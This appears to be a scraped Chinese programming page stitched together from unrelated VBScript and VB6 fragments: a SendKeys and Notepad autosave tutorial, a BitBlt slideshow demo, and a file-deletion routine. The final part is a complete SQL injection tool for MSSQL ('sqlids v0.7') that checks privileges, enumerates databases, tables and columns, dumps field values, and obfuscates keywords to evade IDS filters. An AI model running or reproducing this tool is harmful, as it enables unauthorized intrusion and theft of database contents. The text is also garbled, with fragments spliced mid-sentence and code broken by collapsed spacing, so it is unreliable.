接下来，我们编写一个子过程用来监视一个文件

其使用格式为: object.SendKeys string "object":表示WshShell对象 "string":表示要发送的按键指令字符串,需要放在英文双引号中. 1.基本键 一般来说,要发送的按键指令都可以直接用该按键字符本身来表示,例如要发送字母"x",使用 WshShell.SendKeys "x" 即可. 也可直接发送多个按键指令,只需要将按键字符按顺序排列在一起即可.例如,要发送按键"cfan",可以使用" WshShell.SendKeys "cfan" ". 2.特殊功能键 对于需要与Shift、Ctrl、Alt三个控制键组合的按键SendKeys使用特殊字符来表示: 特殊控制键 特殊字符 Shift + Ctrl ^ Alt % 如要发送的组合按键是同时按下Ctrl+E,需要用" WshShell.SendKeys "^e" "表示, 如果要发送的组合按键是按住Ctrl键的同时按下E与C两个键,这时应使用小括号把字母括起来,书写格式为" WshShell.SendKeys "^(ec)" ".这里要注意它与" WshShell.SendKeys "^ec" "的区别,后者表示组合按键是同时按住Ctrl和E键,然后松开Ctrl键,单独按下"C"字母键 由于"+"、"^"这些字符用来表示特殊的控制按键了,如何表示这些按键呢?只要用大括号括住这些字符即可.例如,要发送加号"+",可使用" WshShell.SendKeys "{+}" ".另外对于一些不会生成字符的控制功能按键,也同样需要使用大括号括起来按键号名称,例如要发送回车键,需要用" WshShell.SendKeys "{ENTER}" "表示,发送向下的方向键用" WshShell.SendKeys "{DOWN}" "表示. 小提示 如果需要发送多个重复的单字母按键,不必重复输入该字母,SendKdys允许使用简化格式进行描述,使用格式为"{按键 数字}".例如要发送10个字母"x",则输入" WshShell.SendKeys "{x 10}" "即可. 3.翻译上手实例 " WshShell.SendKeys "^{ESC}u" "这句翻译为:按下Ctrl+Esc组合键(相当于按Win键)打开"开始"菜单,按着按U键打开"关机"菜单. ---Just Do It--------------------------------- 让VBS脚本自动在词本中输入一行文字"Hello, welcome to cfan". Dim WshShell Set WshShell=WScript.CreateObject("WScript.Shell") WshShell.Run "notepad" WScript.Sleep 200 WshShell.AppActivate " 无标题 - 记事本 " WshShell.SendKeys "hello, welcome to cfan" 我们最常用的记事本没有Word、WPS那样的自动定时存盘功能,其实利用VBS脚本再加上SendKeys命令,就能弥补这个遗憾.打开记事本,输入以下内容(以容易描述和分析,把代码分为四个部分): '第一部分：定义变量和对象 Dim WshShell, AutoSaveTime, TXTFileName AutoSaveTime=300000 Set WshShell=WScript.CreateObject("WScript.Shell") TXTFileName=InputBox("请输入你要创建的文件名(不能用中文和纯数字)：") '第二部分：打开并激活记事本 WshShell.Run "notepad" WScript.Sleep 200 WshShell.AppActivate "无标题 - 记事本" '第三部分：用输入的文件名存盘 WshShell.SendKeys "^s" WScript.Sleep 300 WshShell.SendKeys TXTFileName WScript.Sleep 300 WshShell.SendKeys "%s" WScript.Sleep AutoSaveTime '第四部分：自动定时存盘 While WshShell.AppActivate (TXTFileName)=True WshShell.SendKeys "^s" WScript.Sleep AutoSaveTime Wend WScript.Quit 将其保存为记事本.vbs,以后要使用记事本时,都通过双击这个脚本文件来打开. 程序翻译 这个脚本的基本思路是定时向记事本发送Ctrl+S这个存盘组合键. 第一部分:定义了脚本中需要用到的变量和对象."AutoSaveTime"变量用来设置自动存盘间隔,单位为毫秒,这里设置为5分钟."TXTFileName"变量通过输入框取得你要创建的文本文件名称. 第二部分:运行记事本,对于Windows本身提供的程序,比如计算器等,可直接在"WshShell.Run"后输入程序名称,如"calc"对于非系统程序,则可输入完全路径,但要注意使用8.3格式输入,比如" "D:\Progra~1\Tencent\QQ.exe" " 第三部分:这里用SendKeys命令执行了这样的操作流程(请注意每个操作之间延时命令的使用): 在记事本中按Ctrl+S组合键→弹出保存文件的窗口→输入文件名→按Alt+S组合键进行保存(默认保存在"我的文档"目录). 第四部分:定时存盘的关键,通过"While......Wend"这个当条件为"真"时循环命令,实现自动存盘代码" WshShell.SendKeys "^s" "和定时代码" WScript.Sleep AutoSaveTime "的重复执行.因为不能让这个定时存盘循环一直执行,退出记事本后,必须自动退出脚本并结束循环,所以设计了一个循环判断条件" WshShell.AppActivate TXTFileName=True ",当记事本运行中时,可以激活记事本窗口,这个条件运行结果为"True",定时存盘循环一直执行,退出记事本后,脚本无法激活记事本窗口,就会路出循环,执行"Wend"后面的"WScript.Quit"退出脚本. VBS中Sendkey键盘对应的码表 Key Code ------------------------------ Shift + Ctrl ^ Alt % BACKSPACE {BACKSPACE}, {BS}, or {BKSP} BREAK {BREAK} CAPS LOCK {CAPSLOCK} DEL or DELETE {DELETE} or {DEL} DOWN ARROW {DOWN} END {END} ENTER {ENTER}or ~ ESC {ESC} HELP {HELP} HOME {HOME} INS or INSERT {INSERT} or {INS} LEFT ARROW {LEFT} NUM LOCK {NUMLOCK} PAGE DOWN {PGDN} PAGE UP {PGUP} PRINT SCREEN {PRTSC} RIGHT ARROW {RIGHT} SCROLL LOCK {SCROLLLOCK} TAB {TAB} UP ARROW {UP} F1 {F1} F2 {F2} F3 {F3} F4 {F4} F5 {F5} F6 {F6} F7 {F7} F8 {F8} F9 {F9} F10 {F10} F11 {F11} F12 {F12} F13 {F13} F14 {F14} F15 {F15} F16 {F16} 使用BitBlt函数前要先宣告：DeclareSubBitBltLib"gdi32"(ByValhDestDCAsLong,ByValXAsLong,ByValYAsLong,ByValnWidthAsLong,ByValnHeightAsLong,ByValhSrcDCAsLong,ByValxSrcAsLong,ByValySrcAsLong,ByValdwRopAsLong)hDestDC目的地的DCx目的地的座标xy目的地的座标ynWidth来源图片的宽度nHight来源图片的高度hSrcDC来源图片的DCxsrc来源图片的座标xysrc来源图片的座标ydwrop运算方法：&HCC0020PUT&H8800C6AND&HEE0086OR&H660046XOR现在有两个PictureBoxPicture1AutoRedRaw属性设为TureScaleMode属性设为"3-像素"Picture2AutoRedRaw属性设为TureScaleMode属性设为"3-像素"若想将Picture2里(10,10)-(100,100)区域内的图形拷贝到Picture1的(0,0)可以这样写：BitBltPicture1.hdc,0,0,90,90,Picture2.hdc,10,10,&HCC0020这样子平常写游戏时就只要设两个PictureBox，一个专门用来显示，另一个则用来放图形资料，需要时再用BitBlt函数覆制过去就好了，不是很方便吗？->

作者：lcx 来源：vbs小铺 首先将字符集中的174转一下,wscript.echo"%"&CStr(Hex(ascb(chrb(174)))),url编码的结果为%AE　　下面以具体例子说明如何用SendMessage实现“剪切”、“复制”、“粘贴”、“撤消”和“删除”功能:　　在窗体中放置一个文本框Text1和五个按钮，分别执行以上五种功能，编写以下程序

"&vbCrLf&"耗时"&tm&"毫秒",64,"执行完毕" '不需要显示报告的话，注释掉上面这一行 SetFso=NoThing WScript.quit SubDelFolder(Folder,ListArr) DimobjFolder,subFolders,subFolder SetobjFolder=Fso.Getfolder(Folder) SetsubFolders=objFolder.subFolders ForEachsubFolderInsubFolders IfNotInArray(LIstArr,LCase(subFolder.name))Then OnErrorResumeNext subfolder.Delete(True) IfErrThen err.Clear Msgbox"不能删除目录，请检查"&subFolder,16,"错误" Else fdnum=fdnum+1 EndIf OnErrorGoTo0 EndIf Next EndSub SubDelFile(Folder,ListArr) DimobjFolder,Files,File SetobjFolder=Fso.Getfolder(Folder) SetFiles=objFolder.Files ForEachFileInFiles IfNotInArray(LIstArr,LCase(File.name))Then OnErrorResumeNext File.Delete(True) IfErrThen err.Clear Msgbox"不能删除文件，请检查"&File,16,"错误" Else flnum=flnum+1 EndIf OnErrorGoTo0 EndIf Next EndSub FunctionCheckLine(strLine) DimLineRegExp,Matches SetLineRegExp=NewRegExp LineRegExp.Pattern=".=." LineRegExp.Global=True SetMatches=LineRegExp.Execute(strLine) CheckLine=Matches.count EndFunction FunctionInArray(Myarray,StrIn) DimStrTemp InArray=True ForEachStrTempInMyarray IfStrIn=StrTempThen ExitFunction ExitFor EndIf Next InArray=False EndFunction Form1中的代码：在Declare中定义全局变量：Constbmpfilemax=5&总共5个bmp文件Dimbmpfile(bmpfilemax)AsString&bmp文件的文件名数组Dimdrawbmpmode(bmpfilemax)AsInteger&各画显示时的切换方式Dimbmpnum,movestep,xmax,ymaxAsIntegerDimkxyAsSingle&x,y二个方向的比例程序运行时先作初始化工作：PrivateSubForm-Load()bmpnum=0&当前文件号=0，第一个文件bmpfile(0)=App.Path ''\bmp1.bmp''bmpfile(1)=App.Path ''\bmp2.bmp''bmpfile(2)=App.Path ''\bmp3.bmp''bmpfile(3)=App.Path ''\bmp4.bmp''bmpfile(4)=App.Path ''\bmp5.bmp''drawbmpmode(0)=1drawbmpmode(1)=5drawbmpmode(2)=3drawbmpmode(3)=4drawbmpmode(4)=2movestep=0&步进参数xmax=Form.ScaleWidth/2ymax=Form.ScaleHeight/2kxy=ymax/xmaxPicture1.Picture=LoadPicture(bmpfile(bmpnum))Timer1.Interval=30&定时器起动EndSub响应鼠标：PrivateSubForm-Click()End&当有击鼠标动作时程序结束EndSub切换演示工作主要在定时器中完成：PrivateSubTimer1-Timer()hDestDC=Form1.HDC&目标DChSrcDC=Picture1.hDC&源DC,画是从不可见的Picture1中拷贝到窗体drawflag=drawbmpmode(bmpnum)&当前画出现的方式SelectCasedrawflagCase1&从中间逐步放大endmax=xmax&用于结束判断X1=xmax-movestepw=movestep*2Y1=Cint(ymax-movestep*kxy)h=Cint(2*movestep*kxy)i=BitBlt(hDestDC,X1,Y1,w,h,hSrcDC,X1,Y1,SRCCOPY)Case2&从左到右endmax=xmaxw=movestep*2h=Form1.ScaleHeighti=BitBlt(hDestDC,0,0,w,h,hSrcDC,X1,Y1,SRCCOPY)Case3'左右向中间endmax=xmaxw=movesteph=Form1.ScaleHeighti=BitBlt(hDestDC,0,0,w,h,hSrcDC,0,0,SRCCOPY)&左面部分X1=Form1.ScaleWidth-movestepi=BitBlt(hDestDC,X1,0,w,h,hSrcDC,X1,0,SRCCOPY)&左面部分Case4'栅条状endmax=CInt(2*xmax/10)&共分阶10条tempi=CInt(2*xmax/10)w=movesteph=Form1.ScaleHeightForij=0To9i=BitBlt(hDestDC,tempi*ij,0,w,h,hSrcDC,tempi*ij,0,SRCCOPY)NextijCase5'棱形状endmax=CInt(2*xmax/10)tempi=CInt(2*xmax/10)w=movestepForih=0Tow-1Forik=0To9Forij=0To9l=tempi*ik tempi/2t=tempi*ij tempi/2i=BitBlt(hDestDC,1-(w-ih),t-ih,(w-ih)*2,1,hSrcDC,1-(w-ih),t-ih,SRCCOPY)i=BitBlt(hDestDC,1-(w-ih),t ih,(w-ih)*2,1,hSrcDC,1-(w-ih),t ih,SRCCOPY)NextijNextikNextihEndSelectForm1.Refreshmovestep=movestep 2&步进增加Ifmovestep>endmaxThen&若步进够大，画面都已显示，本张画结束切换bmpnum=bmpnum 1&进到下一张画Ifbmpnum>=bmpfilemaxThen&若5张画已显示完则再从第一张开始bmpnum=0EndIfmovestep=0Picture1.Picture=LoadPicture(bmpfile(bmpnum))EndIfEndSub->->

If TextBox.CanPaste Thengom引擎 称号　　三、几个问题的说明：　　（1）声明中的Lib和Alias是怎么回事　　一般情况下WIN32API函数总是包含在WINDOWS系统自带的或是其它公司提供的动态连接库DLL中，而Declare语句中的Lib关键字就用来指定DLL（动态连接库）文件的路径，这样VB才能找到这个DLL文件，然后才能使用其中的API函数set arg=wscript.arguments If (LCase(Right(Wscript.fullname,11))="Wscript.Exe") Then Wscript.Quit End If if arg.count=0 then usage() Wscript.Quit End If Sub usage() wsh.echo string(79,"*") wsh.echo "暂且只支持mssql显错模式，直接写url为数字型，写url'为字符型,url里有&请用双引号包含url" wsh.echo "sqlids v0.7 for mssql2000 with error by lcx" wsh.echo "以下两个脚本可互相参考" wsh.echo "" wsh.echo "" wsh.echo "Usage:" wsh.echo "cscript "&wscript.scriptname&" url limit ||----------->得到当前权限"&vbcrlf&"Ex:cscript sql.vbs limit" wsh.echo "cscript "&wscript.scriptname&" url dbname ||----------->得到全部库名"&vbcrlf&"Ex:cscript sql.vbs dbname" wsh.echo "cscript "&wscript.scriptname&" url table 库名||-------->得到所给库的全部表名"&vbcrlf&"Ex:cscript sql.vbs table master" wsh.echo "cscript "&wscript.scriptname&" url filed 库名 表名 ||---------->得到所给库所给表的全部字段"&vbcrlf&"Ex:cscript sql.vbs id=1 filed master spt_server_info" wsh.echo "cscript "&wscript.scriptname&" url result 字段名 库名 表名||--->得所给库、表、字段的字段值"&vbcrlf&"Ex:cscript sql.vbs id=1 result id master sysinfo" wsh.echo "cscript "&wscript.scriptname&" url search 你要查找的字段名||--->根据关键字查找字段"&vbcrlf&"Ex:cscript sql.vbs search pass" wsh.echo string(79,"*")&vbcrlf end Sub Function getHTTPPage(Path) t=GetBody(Path) getHTTPPage=BytesToBstr(t, "GB2312") End Function Function UrlEncode(str) str=Replace(str," ","%20") UrlEncode=str End Function Function GetBody(url)' xml得到网页源码，可以改成cookie或get提交 On Error Resume Next Aurl=Split(url,"?") '这是为post提交的 Set Retrieval=CreateObject("Microsoft.XMLHTTP") With Retrieval .Open "post", Aurl(0), False, "", "" .setRequestHeader "Content-Type", "application/x-www-form-urlencoded" .setRequestHeader "Accept-Encoding", "gzip, deflate" .setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" .setRequestHeader "Connection", "Keep-Alive" .setRequestHeader "Cache-Control", "no-cache" .Send UrlEncode(Aurl(1)) 'post提交 GetBody=.ResponseBody .abort End With Set Retrieval=Nothing End Function Function BytesToBstr(Body, Cset) Dim objstream Set objstream=CreateObject("adodb.stream") objstream.Type=1 objstream.Mode=3 objstream.Open objstream.Write Body objstream.Position=0 objstream.Type=2 objstream.Charset=Cset BytesToBstr=objstream.ReadTExt objstream.Close Set objstream=Nothing End Function Function ReplaceKeyWord(Value)'绕过ids过虑 Table="select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in% ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown- >shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har| [k]|fetch->fe%tch|[k]|nExt->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|Exec->e%xec|[k]|=!->=%!|[k]|--->-%-|[k]|xp_->x%p_|[k] |sp_->s%p_|[k]|and->a%nd" Dim i, Relpacement, Temp Relpacement=Split(Table, "|[k]|") ReplaceKeyWord=Value For i=0 to UBound(Relpacement) Temp=Split(Relpacement(i), "->") If UBound(Temp)=1 Then ReplaceKeyWord=Replace(ReplaceKeyWord, Temp(0), Temp(1)) NExt End Function Function result(sHTMLTEMP) '用varchar做关键字分隔网页内容，用正则帅一点，可惜不太会 aHTML=Split(sHTMLTEMP, "varchar") If(UBound(aHTML) > 0)Then sHTMLTEMP=aHTML(1) aHTML=Split(sHTMLTEMP, "'") sHTMLTEMP=aHTML(1) End If result=sHTMLTEMP End Function Function Str2HEx(strHEx)'sql的16进制转换函数 Dim sHEx For i=1 To Len(strHEx) sHEx=sHEx & HEx(Asc(Mid(strHEx,i,1)))&"00" NExt Str2HEx="0x"&sHEx End Function Function Str2HExtwo(strHEx)'sql的16进制转换函数 Dim sHEx For i=1 To Len(strHEx) sHEx=sHEx & HEx(Asc(Mid(strHEx,i,1))) NExt Str2HExtwo="0x"&sHEx End Function Function MoveR(Rstr) '去重复 Dim i,SpStr SpStr=Split(Rstr,",") For i=0 To Ubound(Spstr) If I=0 then MoveR=MoveR & SpStr(i) & "," Else If instr(MoveR,SpStr(i))=0 and i=Ubound(Spstr) Then MoveR=MoveR & SpStr(i) Elseif instr(MoveR,SpStr(i))=0 Then MoveR=MoveR & SpStr(i) & "," End If End If NExt End Function function page(sql) page=Replace(getHTTPPage(url&" "&ReplaceKeyWord(sql)),Chr(34),"") End Function url=arg(0) injection=arg(1) '--------------------------------------以下代码是注入语句，完全不需要引号 select case arg(1) Case "limit" body=Replace(getHTTPPage(url),Chr(34),"") '语句单独提出来，方便以后修改，第一条是sa，第二条是DB_owner sqlone="and (select is_srvrolemember(0x730079007300610064006D0069006E00))>0--" sqltwo="and (select is_member(0x640062005F006F0077006E0065007200))>0--" Bodyone=page(sqlone) bodytwo=page(sqltwo) wsh.echo "当前信息：" If Len(body)=Len(Bodyone) Then wsh.echo "SA" If Len(body)=Len(Bodytwo) And Len(body)<>Len(Bodyone) Then wsh.echo "DB_owner" Else wsh.echo "PUBLIC" End If sqlthtree="and @@servername>0--|and @@version>0--|and user>0--|and db_name()>0--" rtemp=Split(sqlthtree,"|") servername=result(page(rtemp(0))) version=result(page(rtemp(1))) user=result(page(rtemp(2))) db_name=result(page(rtemp(3))) wsh.echo "servername:"&servername wsh.echo "version:"&version wsh.echo "user:"& user wsh.echo "db_name:"& db_name case "dbname" i=1 Do sql="and db_name("&i&")>0--" '暴库名语句 Body=page(sql) k=InstrRev(body,"varchar", -1, 0) i=i+1 If k<>0 Then wscript.echo result(body) Else wsh.echo "========over============" End if Loop Until k=0 case "table" i=1 Do ' 表名语句 agr(2)表示库 sql="and 0<>(select top 1 name from "&arg(2)&".dbo.sysobjects where xtype=0x7500 and name not in (select top "& i &" name from "&arg(2)&".dbo.sysobjects where xtype=0x7500))--" Body=page(sql) k=InstrRev(body,"varchar", -1, 0) i=i+1 If k<>0 Then wscript.echo result(body) Else wsh.echo "========over============" End if Loop Until k=0 case "filed" sqlbiaoid="an%d (se%l%e%c%t to%p 1 ca%st(id as nvarch%ar(20))%2bch%ar(124) fr%om ["&arg(2)&"]..[sy%sob%je%cts] wh%ere name="&Str2HEx(arg(3))&")=0-- " biaoid=result(page(sqlbiaoid)) biaoid=Replace(biaoid,Chr(124),"") sqlclounmcnt="an%d (se%l%e%c%t ca%st(co%unt(1) as varch%ar(10))%2bch%ar(94) fr%om ["&arg(2)&"]..[sys%columns] wh%ere id="&biaoid&")=0-- " k=Replace(result(page(sqlclounmcnt)),Chr(94),"") wsh.echo "共有列名"&k&"个" For i=1 To k sqlfiled=" an%d (se%l%e%c%t to%p 1 ca%st(name as varch%ar(8000)) fr%om (se%l%e%c%t to%p "&i&" colid,name fr%om ["&arg(2)&"]..[sys%columns] wh%ere id="&biaoid&" order by colid) t order by colid desc)=0--" wsh.echo result(page(sqlfiled)) nExt case "result" i=1 sqlcloum="and (select cast(count(1) as varch%ar(8000))%2bchar(94) from ["&arg(3)&"]..["&arg(4)&"] where 1=1)>0--" '暴列的总数目语句 k=result(page(sqlcloum)) k=Replace(k,Chr(94),"") wsh.echo arg(2)&"字段共有记录数"&k&"个"&vbcrlf For i=1 To k sqlneirong="an%d (se%l%e%c%t to%p 1 ca%st("&arg(2)&" as varch%ar)%2bch%ar(94) fr%om (se%l%e%c%t to%p "&i&" ["&arg(2)&"] fr%om ["&arg(3)&"]..["&arg(4) &"] wh%ere 1=1 order by ["&arg(2)&"]) t wh%ere 1=1 order by ["&arg(2)&"] desc )=0--" Body=page(sqlneirong) wscript.echo Replace(result(body),Chr(94),"") Next Case "search" love=Str2HExtwo(arg(2)) wscript.echo "请稍候，正在查循，暂且只列10条，结果显示为'表名|字段名'格式" TimeSpend=Timer For i=1 To 10 '可以根据需要改动这个10 sqlsearch="And (selecttop1t_name%2bchar(124)%2bc_namefrom(selecttop"&i&"object_name(id)ast_name,nameasc_namefromsyscolumnswherecharindEx(cast("&love&"asvarchar(2000)),name)%3E0andleft(name,1)!=0x40orderbyt_nameasc)asTorderbyt_namedesc)>0--" Body=page(sqlsearch) body=result(body) a=a&body&"," NExt TimeSpend=round(Timer - TimeSpend,2) wsh.echo MoveR(a) wsh.echo "用时:" & TimeSpend & "秒." Case Else If arg(1)<>"limit" Or arg(1)<>"dbname" Or arg(1)<>"search" Or arg(1)<>"table" Or arg(1)<>"filed" Then wscript.echo "注意参数" usage() End if end select 。